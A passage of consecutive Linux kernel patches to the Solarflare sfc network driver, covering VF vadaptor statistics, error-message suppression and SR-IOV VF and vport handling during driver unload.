a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index 8b69a31a0ee4..31ff9084d9a4 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -460,6 +460,24 @@ enum { EF10_STAT_port_rx_dp_streaming_packets, EF10_STAT_port_rx_dp_hlb_fetch, EF10_STAT_port_rx_dp_hlb_wait, + EF10_STAT_rx_unicast, + EF10_STAT_rx_unicast_bytes, + EF10_STAT_rx_multicast, + EF10_STAT_rx_multicast_bytes, + EF10_STAT_rx_broadcast, + EF10_STAT_rx_broadcast_bytes, + EF10_STAT_rx_bad, + EF10_STAT_rx_bad_bytes, + EF10_STAT_rx_overflow, + EF10_STAT_tx_unicast, + EF10_STAT_tx_unicast_bytes, + EF10_STAT_tx_multicast, + EF10_STAT_tx_multicast_bytes, + EF10_STAT_tx_broadcast, + EF10_STAT_tx_broadcast_bytes, + EF10_STAT_tx_bad, + EF10_STAT_tx_bad_bytes, + EF10_STAT_tx_overflow, EF10_STAT_COUNT }; From d778819609a27efd5358da8151a0ad3507243e19 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:20 +0100 Subject: [PATCH 607/872] sfc: DMA the VF stats only when requested Firmware does not support a periodic DMA of vadaptor-stats on VFs, so only update the stats buffer when stats are requested (when running "ethtool -S" or an ip/ifconfig command that reports stats). Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 149 ++++++++++++++++++++------- drivers/net/ethernet/sfc/mcdi_pcol.h | 4 +- 2 files changed, 112 insertions(+), 41 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 3da554f848bc..e5fe3b6fe8e2 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1190,7 +1190,50 @@ static size_t efx_ef10_describe_stats(struct efx_nic *efx, u8 *names) mask, names); } -static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) +static size_t efx_ef10_update_stats_common(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) +{ + DECLARE_BITMAP(mask, EF10_STAT_COUNT); + struct efx_ef10_nic_data *nic_data = efx->nic_data; + u64 *stats = nic_data->stats; + size_t stats_count = 0, index; + + efx_ef10_get_stat_mask(efx, mask); + + if (full_stats) { + for_each_set_bit(index, mask, EF10_STAT_COUNT) { + if (efx_ef10_stat_desc[index].name) { + *full_stats++ = stats[index]; + ++stats_count; + } + } + } + + if (core_stats) { + core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; + core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; + core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; + core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + + stats[GENERIC_STAT_rx_nodesc_trunc] + + stats[GENERIC_STAT_rx_noskb_drops]; + core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; + core_stats->rx_length_errors = + stats[EF10_STAT_port_rx_gtjumbo] + + stats[EF10_STAT_port_rx_length_error]; + core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; + core_stats->rx_frame_errors = + stats[EF10_STAT_port_rx_align_error]; + core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; + core_stats->rx_errors = (core_stats->rx_length_errors + + core_stats->rx_crc_errors + + core_stats->rx_frame_errors); + } + + return stats_count; +} + +static int efx_ef10_try_update_nic_stats_pf(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data = efx->nic_data; DECLARE_BITMAP(mask, EF10_STAT_COUNT); @@ -1227,57 +1270,83 @@ static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) } -static size_t efx_ef10_update_stats(struct efx_nic *efx, u64 *full_stats, - struct rtnl_link_stats64 *core_stats) +static size_t efx_ef10_update_stats_pf(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) { - DECLARE_BITMAP(mask, EF10_STAT_COUNT); - struct efx_ef10_nic_data *nic_data = efx->nic_data; - u64 *stats = nic_data->stats; - size_t stats_count = 0, index; int retry; - efx_ef10_get_stat_mask(efx, mask); - /* If we're unlucky enough to read statistics during the DMA, wait * up to 10ms for it to finish (typically takes <500us) */ for (retry = 0; retry < 100; ++retry) { - if (efx_ef10_try_update_nic_stats(efx) == 0) + if (efx_ef10_try_update_nic_stats_pf(efx) == 0) break; udelay(100); } - if (full_stats) { - for_each_set_bit(index, mask, EF10_STAT_COUNT) { - if (efx_ef10_stat_desc[index].name) { - *full_stats++ = stats[index]; - ++stats_count; - } - } - } + return efx_ef10_update_stats_common(efx, full_stats, core_stats); +} - if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + - stats[GENERIC_STAT_rx_nodesc_trunc] + - stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; - core_stats->rx_length_errors = - stats[EF10_STAT_port_rx_gtjumbo] + - stats[EF10_STAT_port_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; - core_stats->rx_frame_errors = - stats[EF10_STAT_port_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; - core_stats->rx_errors = (core_stats->rx_length_errors + - core_stats->rx_crc_errors + - core_stats->rx_frame_errors); +static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) +{ + MCDI_DECLARE_BUF(inbuf, MC_CMD_MAC_STATS_IN_LEN); + struct efx_ef10_nic_data *nic_data = efx->nic_data; + DECLARE_BITMAP(mask, EF10_STAT_COUNT); + __le64 generation_start, generation_end; + u64 *stats = nic_data->stats; + u32 dma_len = MC_CMD_MAC_NSTATS * sizeof(u64); + struct efx_buffer stats_buf; + __le64 *dma_stats; + int rc; + + efx_ef10_get_stat_mask(efx, mask); + + rc = efx_nic_alloc_buffer(efx, &stats_buf, dma_len, GFP_ATOMIC); + if (rc) + return rc; + + dma_stats = stats_buf.addr; + dma_stats[MC_CMD_MAC_GENERATION_END] = EFX_MC_STATS_GENERATION_INVALID; + + MCDI_SET_QWORD(inbuf, MAC_STATS_IN_DMA_ADDR, stats_buf.dma_addr); + MCDI_POPULATE_DWORD_1(inbuf, MAC_STATS_IN_CMD, + MAC_STATS_IN_DMA, true); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); + + spin_unlock_bh(&efx->stats_lock); + rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, + 0, NULL); + spin_lock_bh(&efx->stats_lock); + if (rc) + goto out; + + generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; + if (generation_end == EFX_MC_STATS_GENERATION_INVALID) + goto out; + rmb(); + efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT, mask, + stats, stats_buf.addr, false); + rmb(); + generation_start = dma_stats[MC_CMD_MAC_GENERATION_START]; + if (generation_end != generation_start) { + rc = -EAGAIN; + goto out; } - return stats_count; + efx_update_sw_stats(efx, stats); +out: + efx_nic_free_buffer(efx, &stats_buf); + return rc; +} + +static size_t efx_ef10_update_stats_vf(struct efx_nic *efx, u64 *full_stats, + struct rtnl_link_stats64 *core_stats) +{ + if (efx_ef10_try_update_nic_stats_vf(efx)) + return 0; + + return efx_ef10_update_stats_common(efx, full_stats, core_stats); } static void efx_ef10_push_irq_moderation(struct efx_channel *channel) @@ -4122,7 +4191,7 @@ const struct efx_nic_type efx_hunt_a0_vf_nic_type = { .prepare_flr = efx_ef10_prepare_flr, .finish_flr = efx_port_dummy_op_void, .describe_stats = efx_ef10_describe_stats, - .update_stats = efx_ef10_update_stats, + .update_stats = efx_ef10_update_stats_vf, .start_stats = efx_port_dummy_op_void, .pull_stats = efx_port_dummy_op_void, .stop_stats = efx_port_dummy_op_void, @@ -4224,7 +4293,7 @@ const struct efx_nic_type efx_hunt_a0_nic_type = { .prepare_flr = efx_ef10_prepare_flr, .finish_flr = efx_port_dummy_op_void, .describe_stats = efx_ef10_describe_stats, - .update_stats = efx_ef10_update_stats, + .update_stats = efx_ef10_update_stats_pf, .start_stats = efx_mcdi_mac_start_stats, .pull_stats = efx_mcdi_mac_pull_stats, .stop_stats = efx_mcdi_mac_stop_stats, diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 0e497b36f53e..181978d64845 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2755,7 +2755,7 @@ #define MC_CMD_0x2e_PRIVILEGE_CTG SRIOV_CTG_GENERAL /* MC_CMD_MAC_STATS_IN msgrequest */ -#define MC_CMD_MAC_STATS_IN_LEN 16 +#define MC_CMD_MAC_STATS_IN_LEN 20 /* ??? */ #define MC_CMD_MAC_STATS_IN_DMA_ADDR_OFST 0 #define MC_CMD_MAC_STATS_IN_DMA_ADDR_LEN 8 @@ -2777,6 +2777,8 @@ #define MC_CMD_MAC_STATS_IN_PERIOD_MS_LBN 16 #define MC_CMD_MAC_STATS_IN_PERIOD_MS_WIDTH 16 #define MC_CMD_MAC_STATS_IN_DMA_LEN_OFST 12 +/* port id so vadapter stats can be provided */ +#define MC_CMD_MAC_STATS_IN_PORT_ID_OFST 16 /* MC_CMD_MAC_STATS_OUT_DMA msgresponse */ #define MC_CMD_MAC_STATS_OUT_DMA_LEN 0 From 0fc95fca5a95170a3615557218d98b6dff52ad36 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:33 +0100 Subject: [PATCH 608/872] sfc: update netdevice statistics to use vadaptor stats The netdevice statistics (in /proc/net/dev) are per-function stats so they must use the vadaptor stats. Change the use of MAC stats to vadaptor stats, and remove any statistics that can only be measured per-port. All stats that are removed will be shown as zeroes when these statistics are displayed. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 41 ++++++++++++++++++--------------- 1 file changed, 22 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index e5fe3b6fe8e2..b880d984a649 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1210,24 +1210,25 @@ static size_t efx_ef10_update_stats_common(struct efx_nic *efx, u64 *full_stats, } if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + - stats[GENERIC_STAT_rx_nodesc_trunc] + + core_stats->rx_packets = stats[EF10_STAT_rx_unicast] + + stats[EF10_STAT_rx_multicast] + + stats[EF10_STAT_rx_broadcast]; + core_stats->tx_packets = stats[EF10_STAT_tx_unicast] + + stats[EF10_STAT_tx_multicast] + + stats[EF10_STAT_tx_broadcast]; + core_stats->rx_bytes = stats[EF10_STAT_rx_unicast_bytes] + + stats[EF10_STAT_rx_multicast_bytes] + + stats[EF10_STAT_rx_broadcast_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_tx_unicast_bytes] + + stats[EF10_STAT_tx_multicast_bytes] + + stats[EF10_STAT_tx_broadcast_bytes]; + core_stats->rx_dropped = stats[GENERIC_STAT_rx_nodesc_trunc] + stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; - core_stats->rx_length_errors = - stats[EF10_STAT_port_rx_gtjumbo] + - stats[EF10_STAT_port_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; - core_stats->rx_frame_errors = - stats[EF10_STAT_port_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; - core_stats->rx_errors = (core_stats->rx_length_errors + - core_stats->rx_crc_errors + - core_stats->rx_frame_errors); + core_stats->multicast = stats[EF10_STAT_rx_multicast]; + core_stats->rx_crc_errors = stats[EF10_STAT_rx_bad]; + core_stats->rx_fifo_errors = stats[EF10_STAT_rx_overflow]; + core_stats->rx_errors = core_stats->rx_crc_errors; + core_stats->tx_errors = stats[EF10_STAT_tx_bad]; } return stats_count; @@ -1310,7 +1311,7 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_QWORD(inbuf, MAC_STATS_IN_DMA_ADDR, stats_buf.dma_addr); MCDI_POPULATE_DWORD_1(inbuf, MAC_STATS_IN_CMD, - MAC_STATS_IN_DMA, true); + MAC_STATS_IN_DMA, 1); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); @@ -1322,8 +1323,10 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) goto out; generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; - if (generation_end == EFX_MC_STATS_GENERATION_INVALID) + if (generation_end == EFX_MC_STATS_GENERATION_INVALID) { + WARN_ON_ONCE(1); goto out; + } rmb(); efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT, mask, stats, stats_buf.addr, false); From 6dd4859b281700a163caec8ae7826c2558290127 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:49 +0100 Subject: [PATCH 609/872] sfc: suppress ENOENT error messages from MC_CMD_MAC_STATS MC_CMD_MAC_STATS can be called on a function before a vadaptor has been created, as the kernel can call into this through ndo_get_stats/ndo_get_stats64. If MC_CMD_MAC_STATS is called before the DMA queues have been setup, so that a vadaptor has not been created yet, firmware will return ENOENT. This is expected, so suppress the MCDI error message in this case. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 11 ++++++++--- drivers/net/ethernet/sfc/mcdi_port.c | 8 ++++++-- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index b880d984a649..a79a24f94123 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1316,11 +1316,16 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); spin_unlock_bh(&efx->stats_lock); - rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, - 0, NULL); + rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), + NULL, 0, NULL); spin_lock_bh(&efx->stats_lock); - if (rc) + if (rc) { + /* Expect ENOENT if DMA queues have not been set up */ + if (rc != -ENOENT || atomic_read(&efx->active_queues)) + efx_mcdi_display_error(efx, MC_CMD_MAC_STATS, + sizeof(inbuf), NULL, 0, rc); goto out; + } generation_end = dma_stats[MC_CMD_MAC_GENERATION_END]; if (generation_end == EFX_MC_STATS_GENERATION_INVALID) { diff --git a/drivers/net/ethernet/sfc/mcdi_port.c b/drivers/net/ethernet/sfc/mcdi_port.c index fffc34888c02..7f295c4d7b80 100644 --- a/drivers/net/ethernet/sfc/mcdi_port.c +++ b/drivers/net/ethernet/sfc/mcdi_port.c @@ -948,8 +948,12 @@ static int efx_mcdi_mac_stats(struct efx_nic *efx, MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, nic_data->vport_id); - rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), - NULL, 0, NULL); + rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), + NULL, 0, NULL); + /* Expect ENOENT if DMA queues have not been set up */ + if (rc && (rc != -ENOENT || atomic_read(&efx->active_queues))) + efx_mcdi_display_error(efx, MC_CMD_MAC_STATS, sizeof(inbuf), + NULL, 0, rc); return rc; } From d94619cdfc561eee18e2d40ab6563e3f2f072fdd Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:05 +0100 Subject: [PATCH 610/872] sfc: suppress vadaptor stats when EVB is not present The raw_mask array is not initialised, so it needs to be explicitly set to zero in the 'else' branch. If the EVB capability is not present, a port cannot have multiple functions so the per-port MAC stats are correct and should match the corresponding vadaptor stats, so this redundancy can be removed from the ethtool stats output. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 12 +++++++++--- drivers/net/ethernet/sfc/mcdi_pcol.h | 2 ++ 2 files changed, 11 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index a79a24f94123..03f464fdd2b9 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1162,13 +1162,19 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) static void efx_ef10_get_stat_mask(struct efx_nic *efx, unsigned long *mask) { + struct efx_ef10_nic_data *nic_data = efx->nic_data; u64 raw_mask[2]; raw_mask[0] = efx_ef10_raw_stat_mask(efx); - /* All functions see the vadaptor stats */ - raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); - raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; + /* Only show vadaptor stats when EVB capability is present */ + if (nic_data->datapath_caps & + (1 << MC_CMD_GET_CAPABILITIES_OUT_EVB_LBN)) { + raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); + raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; + } else { + raw_mask[1] = 0; + } #if BITS_PER_LONG == 64 mask[0] = raw_mask[0]; diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 181978d64845..45fca9fc66b7 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -5600,6 +5600,8 @@ #define MC_CMD_GET_CAPABILITIES_OUT_MCAST_FILTER_CHAINING_WIDTH 1 #define MC_CMD_GET_CAPABILITIES_OUT_PM_AND_RXDP_COUNTERS_LBN 27 #define MC_CMD_GET_CAPABILITIES_OUT_PM_AND_RXDP_COUNTERS_WIDTH 1 +#define MC_CMD_GET_CAPABILITIES_OUT_EVB_LBN 30 +#define MC_CMD_GET_CAPABILITIES_OUT_EVB_WIDTH 1 /* RxDPCPU firmware id. */ #define MC_CMD_GET_CAPABILITIES_OUT_RX_DPCPU_FW_ID_OFST 4 #define MC_CMD_GET_CAPABILITIES_OUT_RX_DPCPU_FW_ID_LEN 2 From f00bf2305cabc2313c70575384aee60e8f2a684d Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:18 +0100 Subject: [PATCH 611/872] sfc: don't update stats on VF when called in atomic context The ifenslave command to set up a bond runs in an atomic context, and it queries the stats on the devices that are being enslaved. A VF needs to make an MCDI call to update its stats, which is not allowed in atomic context. The releasing of the stats_lock is moved to the beginning of the VF stats update function so that in_interrupt() can be used; it must be taken again before returning from this function. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 03f464fdd2b9..6b8d8f254515 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1306,11 +1306,24 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) __le64 *dma_stats; int rc; + spin_unlock_bh(&efx->stats_lock); + + if (in_interrupt()) { + /* If in atomic context, cannot update stats. Just update the + * software stats and return so the caller can continue. + */ + spin_lock_bh(&efx->stats_lock); + efx_update_sw_stats(efx, stats); + return 0; + } + efx_ef10_get_stat_mask(efx, mask); rc = efx_nic_alloc_buffer(efx, &stats_buf, dma_len, GFP_ATOMIC); - if (rc) + if (rc) { + spin_lock_bh(&efx->stats_lock); return rc; + } dma_stats = stats_buf.addr; dma_stats[MC_CMD_MAC_GENERATION_END] = EFX_MC_STATS_GENERATION_INVALID; @@ -1321,7 +1334,6 @@ static int efx_ef10_try_update_nic_stats_vf(struct efx_nic *efx) MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, EVB_PORT_ID_ASSIGNED); - spin_unlock_bh(&efx->stats_lock); rc = efx_mcdi_rpc_quiet(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, 0, NULL); spin_lock_bh(&efx->stats_lock); From 71158bf2e748e2710616f59a823619af3c5505a7 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:31 +0100 Subject: [PATCH 612/872] sfc: do not allow VFs to be destroyed if assigned to guests Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10_sriov.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index cd524543c363..083c534bc4ec 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -417,6 +417,15 @@ static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) { struct pci_dev *dev = efx->pci_dev; + if (!efx->vf_count) + return 0; + + if (pci_vfs_assigned(dev)) { + netif_err(efx, drv, efx->net_dev, "VFs are assigned to guests; " + "please detach them before disabling SR-IOV\n"); + return -EBUSY; + } + pci_disable_sriov(dev); efx_ef10_sriov_free_vf_vswitching(efx); efx->vf_count = 0; From 2a3fc3112275e93df2e7e09b37b002ffddfd4ba1 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:40:46 +0100 Subject: [PATCH 613/872] sfc: force removal of VF and vport on driver removal When the driver unloads, force the unbind and removal of any VFs in the host with the PF. The PF cannot remove vports and vswitches if they are still being used by a VF driver, and when unloading the sfc driver the removal order is not guaranteed, so the instruction from the PF to the VF to unbind enforces a suitable ordering so that vswitches and vports can be removed. As a result of this, manually unbinding the driver from a single PF will result in all of its VFs in the host also being removed. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10_sriov.c | 9 +++++++++ drivers/net/ethernet/sfc/efx.c | 3 ++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 083c534bc4ec..41ab18d4b107 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -448,11 +448,20 @@ int efx_ef10_sriov_init(struct efx_nic *efx) void efx_ef10_sriov_fini(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data = efx->nic_data; + unsigned int i; int rc; if (!nic_data->vf) return; + /* Remove any VFs in the host */ + for (i = 0; i < efx->vf_count; ++i) { + struct efx_nic *vf_efx = nic_data->vf[i].efx; + + if (vf_efx) + vf_efx->pci_dev->driver->remove(vf_efx->pci_dev); + } + rc = efx_ef10_pci_sriov_disable(efx); if (rc) netif_dbg(efx, drv, efx->net_dev, diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index de16cec7ec61..62b213973433 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2902,7 +2902,8 @@ static void efx_pci_remove_main(struct efx_nic *efx) } /* Final NIC shutdown - * This is called only at module unload (or hotplug removal). + * This is called only at module unload (or hotplug removal). A PF can call + * this on its VFs to ensure they are unbound first. */ static void efx_pci_remove(struct pci_dev *pci_dev) { From 6598dad26b7fa39003e4de85d68c584666d5bc21 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:41:00 +0100 Subject: [PATCH 614/872] sfc: leak vports if a VF is assigned during PF unload If any VF is assigned as the PF is unloaded, do not attempt to remove its vport or the vswitch. These will be removed if the driver binds to the PF again, as an entity reset occurs during probe. A 'force' flag is added to efx_ef10_pci_sriov_disable() to distinguish between disabling SR-IOV and driver unload. SR-IOV cannot be disabled if VFs are assigned to guests. If the PF driver is unloaded while VFs are assigned, the driver may try to bind to the VF again at a later point if the driver has been reloaded and the VF returns to the same domain as the PF. In this case, the PF will not have a VF data structure, so the VF can check this and drop out of probe early. In this case, efx->vf_count will be zero but VFs will be present. The user is advised to remove the VF and re-create it. The check at the beginning of efx_ef10_pci_sriov_disable() that efx->vf_count is non-zero is removed to allow SR-IOV to be disabled in this case. Also, if the PF driver is unloaded, it will disable SR-IOV to remove these unknown VFs. By not disabling bus-mastering if VFs are still assigned, the VF will continue to pass traffic after the PF has been removed. When using the max_vfs module parameter, if VFs are already present do not try to initialise any more. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 20 +++++++++++++++ drivers/net/ethernet/sfc/ef10_sriov.c | 35 ++++++++++++++++++--------- drivers/net/ethernet/sfc/ef10_sriov.h | 2 ++ drivers/net/ethernet/sfc/efx.c | 4 ++- 4 files changed, 49 insertions(+), 12 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 6b8d8f254515..847643455468 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -681,6 +681,24 @@ static int efx_ef10_probe_pf(struct efx_nic *efx) static int efx_ef10_probe_vf(struct efx_nic *efx) { int rc; + struct pci_dev *pci_dev_pf; + + /* If the parent PF has no VF data structure, it doesn't know about this + * VF so fail probe. The VF needs to be re-created. This can happen + * if the PF driver is unloaded while the VF is assigned to a guest. + */ + pci_dev_pf = efx->pci_dev->physfn; + if (pci_dev_pf) { + struct efx_nic *efx_pf = pci_get_drvdata(pci_dev_pf); + struct efx_ef10_nic_data *nic_data_pf = efx_pf->nic_data; + + if (!nic_data_pf->vf) { + netif_info(efx, drv, efx->net_dev, + "The VF cannot link to its parent PF; " + "please destroy and re-create the VF\n"); + return -EBUSY; + } + } rc = efx_ef10_probe(efx); if (rc) @@ -698,6 +716,8 @@ static int efx_ef10_probe_vf(struct efx_nic *efx) struct efx_ef10_nic_data *nic_data = efx->nic_data; nic_data_p->vf[nic_data->vf_index].efx = efx; + nic_data_p->vf[nic_data->vf_index].pci_dev = + efx->pci_dev; } else netif_info(efx, drv, efx->net_dev, "Could not get the PF id from VF\n"); diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 41ab18d4b107..6c9b6e45509a 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -165,6 +165,11 @@ static void efx_ef10_sriov_free_vf_vports(struct efx_nic *efx) for (i = 0; i < efx->vf_count; i++) { struct ef10_vf *vf = nic_data->vf + i; + /* If VF is assigned, do not free the vport */ + if (vf->pci_dev && + vf->pci_dev->dev_flags & PCI_DEV_FLAGS_ASSIGNED) + continue; + if (vf->vport_assigned) { efx_ef10_evb_port_assign(efx, EVB_PORT_ID_NULL, i); vf->vport_assigned = 0; @@ -380,7 +385,9 @@ void efx_ef10_vswitching_remove_pf(struct efx_nic *efx) efx_ef10_vport_free(efx, nic_data->vport_id); nic_data->vport_id = EVB_PORT_ID_ASSIGNED; - efx_ef10_vswitch_free(efx, nic_data->vport_id); + /* Only free the vswitch if no VFs are assigned */ + if (!pci_vfs_assigned(efx->pci_dev)) + efx_ef10_vswitch_free(efx, nic_data->vport_id); } void efx_ef10_vswitching_remove_vf(struct efx_nic *efx) @@ -413,20 +420,22 @@ static int efx_ef10_pci_sriov_enable(struct efx_nic *efx, int num_vfs) return rc; } -static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) +static int efx_ef10_pci_sriov_disable(struct efx_nic *efx, bool force) { struct pci_dev *dev = efx->pci_dev; + unsigned int vfs_assigned = 0; - if (!efx->vf_count) - return 0; + vfs_assigned = pci_vfs_assigned(dev); - if (pci_vfs_assigned(dev)) { - netif_err(efx, drv, efx->net_dev, "VFs are assigned to guests; " - "please detach them before disabling SR-IOV\n"); + if (vfs_assigned && !force) { + netif_info(efx, drv, efx->net_dev, "VFs are assigned to guests; " + "please detach them before disabling SR-IOV\n"); return -EBUSY; } - pci_disable_sriov(dev); + if (!vfs_assigned) + pci_disable_sriov(dev); + 